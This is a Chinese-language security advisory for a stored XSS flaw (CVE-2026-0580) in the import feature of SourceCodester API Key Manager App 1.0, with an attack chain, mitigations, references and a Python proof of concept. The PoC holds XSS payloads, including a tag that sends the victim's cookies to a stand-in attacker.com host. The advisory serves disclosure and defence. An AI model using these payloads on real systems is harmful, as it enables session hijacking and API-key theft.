CVE-2026-0580: SourceCodester API Key Manager App 1.0 Import Key Handler跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-0580

漏洞类型

XSS跨站脚本漏洞

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester API Key Manager App 1.0

漏洞概述

CVE-2026-0580是SourceCodester公司开发的API Key Manager App 1.0版本中存在的一个跨站脚本(XSS)安全漏洞。该漏洞位于应用程序的Import Key Handler组件中，攻击者可以通过构造恶意的输入数据，在用户浏览器中执行任意JavaScript代码。由于该漏洞需要低权限用户进行操作，并且需要用户交互才能触发，因此CVSS评分仅为3.5，属于低危漏洞。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。漏洞于2026年1月5日被披露，发现者为vuldb.com安全研究团队。由于API Key Manager应用通常处理敏感的API密钥信息，该漏洞可能导致密钥信息泄露或账户被非法控制。

技术细节

该漏洞属于存储型XSS(Stored XSS)或反射型XSS(Reflected XSS)，具体类型取决于Import Key Handler的实现方式。攻击者通过Import Key功能上传包含恶意JavaScript代码的API密钥数据，当其他用户查看或管理系统中的密钥时，恶意代码会在其浏览器上下文中执行。漏洞产生的根本原因是应用程序未对用户输入进行充分的输入验证和输出编码。在Import Key Handler组件中，系统应该对导入的密钥名称、描述、标签等字段进行严格的输入验证，使用HTML实体编码转义特殊字符，并实施内容安全策略(CSP)来防止恶意脚本执行。攻击者可以构造如下Payload：<script>alert(document.cookie)</script>作为密钥名称或描述，当管理员查看密钥列表时触发XSS。防御措施包括：1)对所有用户输入进行白名单验证；2)在输出点对HTML特殊字符进行编码；3)启用HttpOnly和Secure标志保护Cookie；4)配置严格的Content-Security-Policy响应头。

攻击链分析

STEP 1

步骤1

攻击者注册并登录SourceCodester API Key Manager App低权限账户

STEP 2

步骤2

攻击者构造包含XSS恶意代码的API密钥数据，通过Import Key Handler功能导入系统

STEP 3

步骤3

恶意脚本被存储在数据库中，当管理员或目标用户访问密钥管理页面时触发执行

STEP 4

步骤4

攻击者通过XSS窃取用户会话Cookie、劫持账户或进行进一步的内网渗透

STEP 5

步骤5

如果API密钥被泄露，攻击者可利用这些密钥访问目标系统API资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-0580 PoC - XSS in SourceCodester API Key Manager App 1.0
# Import Key Handler XSS Vulnerability

target_url = "http://target.com/api-key-manager"

# Malicious XSS payload for Import Key Handler
xss_payload = {
    "keys": [
        {
            "name": "<script>alert('XSS')</script>",
            "api_key": "test_key_12345",
            "description": "<img src=x onerror=alert(document.cookie)>",
            "tags": ["<script>fetch('http://attacker.com?c='+document.cookie)</script>"]
        }
    ]
}

# Step 1: Authenticate with low-privilege account
login_url = f"{target_url}/login"
session = requests.Session()
login_data = {
    "username": "attacker",
    "password": "password123"
}
response = session.post(login_url, data=login_data)

# Step 2: Import malicious key with XSS payload
import_url = f"{target_url}/keys/import"
response = session.post(import_url, json=xss_payload)

# Step 3: Wait for admin to view the key list
# When admin visits /keys page, XSS will be triggered

print(f"[+] XSS Payload sent: {xss_payload}")
print(f"[+] Response status: {response.status_code}")
print("[+] PoC executed. XSS will trigger when victim views the key.")

影响范围

SourceCodester API Key Manager App 1.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)禁用Import Key Handler功能的文件上传接口；2)对所有密钥导入请求进行人工审核；3)限制低权限用户使用导入功能；4)在Web应用防火墙(WAF)中配置XSS防护规则拦截恶意请求；5)加强会话管理，定期刷新会话Token；6)监控应用程序日志，及时发现异常请求和XSS攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0580
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0580
3 Details https://www.cvedetails.com/cve/CVE-2026-0580/
4 VulDB https://vuldb.com/cve/CVE-2026-0580
5 Link https://vuldb.com/?ctiid.339472
6 Link https://vuldb.com/?id.339472
7 Link https://vuldb.com/?submit.731146
8 Link https://vuldb.com/?submit.731290
9 Link https://www.sourcecodester.com/